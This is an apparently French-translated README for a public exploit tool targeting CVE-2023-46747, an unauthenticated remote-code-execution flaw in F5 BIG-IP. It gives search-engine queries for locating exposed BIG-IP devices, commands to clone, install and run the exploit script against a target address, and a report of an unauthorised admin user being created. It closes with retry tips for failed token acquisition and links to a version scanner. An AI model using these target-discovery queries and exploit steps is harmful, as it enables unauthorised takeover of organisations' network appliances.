CVE 2023 46747 RCE

 (title="BIG-IP®" || icon_hash="-335242539")

 title:"BIG-IP®"

https://my.f5.com/manage/s/article/K000137353

1. Pour le moment, l'utilisateur ici est uniquement admin :

2. Exécutez le script :

 git clone https://github.com/W01fh4cker/CVE-2023-46747-RCE.git
cd CVE-2023-46747-RCE
pip install -r requirements.txt
python CVE-2023-46747-RCE.py -u https://192.168.161.190
# python CVE-2023-46747-RCE.py -u https://192.168.161.190 -p http://127.0.0.1:7890

Commande exécutée avec succès :

3. Un nouvel utilisateur a été créé avec succès sans autorisation ici :

L'exploitation échoue dans certaines versions, référence : https://twitter.com/joel_land/status/1729147886615818732.

1. Q : L'acquisition du jeton a échoué ?
   R : On ne peut pas dire qu'il ne doit y avoir aucune vulnérabilité dans le site de test, car la création d'un utilisateur sans autorisation ne réussit pas à 100 %. Parfois, vous ne créez pas d'utilisateur lors de la première étape pour certaines raisons, de sorte que le jeton de la deuxième étape ne peut pas être obtenu. Par conséquent, ma suggestion est d’essayer encore quelques fois. Si cela ne fonctionne pas, cela peut vouloir dire qu’il n’y a effectivement aucune vulnérabilité.

Vous pouvez utiliser ce script https://github.com/BishopFox/bigip-scanner pour collecter les informations de version F5 BIG-IP. C'est super !

projectdiscovery/nuclei-templates#8500
https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg
https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747